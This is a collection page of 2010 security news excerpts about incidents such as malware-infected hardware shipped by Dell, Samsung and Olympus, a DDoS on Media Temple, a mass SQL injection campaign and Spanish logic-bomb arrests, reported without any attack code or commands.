background preloader

2010 Incident Handling

Facebook Twitter

Dell Ships Malware-Infected Server Motherboard. IBM hands out infected USB drives at security conference - The H. Web hoster Media Temple shut down by attack | InSecurity Complex. Media Temple, Web hosting provider for Adobe, ABC, Sony, NBC, Time, Volkswagen, and Starbucks, was hit with a sophisticated distributed denial-of-service (DDoS) attack Tuesday. The outage began about 3:50 p.m. PDT, when Media Temple's domain name servers were deluged by a flood of traffic coming from outside the U.S., and lasted a total of about two-and-a-half hours, according to a tech support representative at the Los Angeles-based company.

"Due to the sophistication of the attack, our normal DDoS firewall prevention techniques didn't block the attack adequately, as the traffic appears to be legitimate," the company reported at around 5:40 p.m. PDT. The company said it had initially blocked all traffic from Asia, South America, and Mexico to reduce strain on the network, but later removed the blocks. Company representatives did not immediately return a call seeking comment. Breakdown of all the major online threats in May. Posted on 26 May 2010. Latest MessageLabs Intelligence Report reveals that nine out of ten spam emails now contain a URL link in the message.

In May, five percent of all domains found in spam URLs belonged to genuine web sites. Of the most frequently used domain names contained in spam URLs, the top four belong to well-known web sites used for social networking, blogging, file sharing and host other forms of user-generated content. While Rustock is the botnet that uses the greatest number of disposable domains, Storm, which has recently returned to the spamming scene, is the only botnet that uses genuine domains in greater number than disposable domains.

Sixty-five percent of spam from the Storm botnet uses a legitimate domain, many of which are for URL shortening services. Disposable domains are often used quickly after being first registered; and on average, 50 percent are used within nine days, before spammers switch to newer domains. Other stats from the report include: Spyware Found on 3 Major Mac Download Sites. Microsoft Releases Anti-XSS Web Protection Library. SMS Blockers: The New Face of Ransomware. Samsung smartphone shipped with malware-infected memory card.

The latest mass-market product that has been found being shipped to customers while containing malware is the Samsung S8500 Wave phone with the Samsung bada mobile platform. The malicious file in question is slmvsrv.exe, and can be found on the 1GB microSD memory card contained in the smartphone. The malicious file is accompanied by an Autorun.inf file, which installs itself on any Windows PC that still has the autorun feature enabled. According to Michael Oryl, he received a device for testing and after he found out that the card was infected, he did an online search for the file in question and unearthed two posts on some German forums that claim the same. He contacted Samsung, and they confirmed that the initial production run of the devices shipped to Germany was, indeed, infected.

"A PC that is infected with the malware will try to copy the program and associated autorun.inf file onto any memory card or USB memory drive that is inserted into the infected computer. Olympus Stylus Tough camera shipped with malware. Samsung is not the only company that has been lately caught shipping malware-infected consumer electronics - Olympus Japan has admitted that a little over 1700 units of the Stylus Tough 6010 digital compact camera that was available for sale in Japan contain a virus on the memory card shipped with it. According to Sophos, the camera itself is not at risk - it is your PC that you have to worry about, since the card also contains an autorun worm that would allow the virus to take residence on the computer when you plug the device into it. For the people who might have bought one of the "infected" cameras, Olympus has provided a widget on their official site where customers can insert the serial number of the camera in order to check if their device is affected: Unfortunately, for those who don't know Japanese the site is pretty much useless - unless they have someone who can translate the results for them.

Mass SQL injection attack compromises IIS/ASP sites. Posted on 10 June 2010. Thousands of websites and who knows how many visitors were affected by the recently discovered mass SQL injection attack that targeted - among others - The Wall Street Journal and The Jerusalem Post websites. Sucuri Security spotted the attack on many websites and Googled the web address to which the script was pointing, and according to the results, some 114.000 different pages contained it. Further investigation into the matter revealed the common denominator: all sites are hosted on IIS servers and use ASP.net. By sifting through the logs and the packet dump of the attack, they also discovered that the attack was launched against a third party ad management script.

When a user visits a compromised site, the malicious code will attempt to redirect him to a site where malware is waiting to be installed on his machine and allow the criminals behind this attack remote access to it. Drupal clarifies security rules after White-House gaper • The Re. High performance access to file storage Webmasters running unfinished modules for Drupal do so at their own risk after the open-source CMS updated its guidelines on fixing security vulnerabilities.

The project has updated the wording on its security site on how it handles security fixes to clarify it will only work on vulnerabilities in completed code of modules that comprise the CMS. The change clarifies that modules in release-candidate mode will not be supported. Drupal will work with maintainers of modules that are code complete, with maintainers now given a deadline to fix the problem.

If the deadline's missed, the module and the project will be unpublished from Drupal.org. Vulnerabilities in unfinished code will simply be flagged in the module's issue queue. The clarifications are a response to the discovery of a potentially serious XSS hole in the Drupal Context module three weeks after White House developers proudly released their own plug-in based on the buggy module.

SSH Brute Force Attacks Resurface. Malicious code on Lenovo driver download page - Update - The H S. Spanish firm raided in logic-bomb backdoor probe. Big Security for Big Data Three managers at an unnamed Spanish software developer have been arrested over allegations they planted 'logic bombs' in software that meant clients were obliged to pay for disruptive repairs and extended maintenance contracts. The Guardia Civil said that more than 1,000 clients of the Andalucia-based developer were affected by the scam since 1998.

The unnamed firm sold marketed custom software to small and medium-sized businesses with built-in errors such that it was guaranteed to fail at a predetermined date. These errors would "paralyse the normal functioning of businesses" and oblige customers to contact their supplier, who would hit them for repair fees and extended support. In the course of making repairs, the developer allegedly programmed systems to fail again at a future date. An anonymous web-based tip-off led to a Guardia Civil investigation and a subsequent raid on the firm's premises, where computer equipment and records were seized for analysis. Report: Chinese Military Behind Google, Other Cyberattacks - Dar. Most attacks traced to Chinese island tourist attraction that also houses state-of-the-art military installation A new report handed to Congress today concludes that the Chinese military -- the People's Liberation Army -- is behind most cyberattacks on the U.S., including the infamous Operation Aurora attacks that hit Google, Adobe, Intel, and other companies.

The "China, Cyber Espionage and U.S. National Security" white paper, authored by independent research group Medius Research and commissioned by political action organization Patriot Majority, says most cyberattacks out of China originate from Hainan Island, a tourist attraction with a massive high-tech military installation located on the South China Sea. "Hainan Island is a pretty good showcase of military modernization. It combines several capabilities, including a space launch and a submarine [base]," says Richard Parker, lead researcher for the Medius report. The report says the U.S. Have a comment on this story?

More Insights.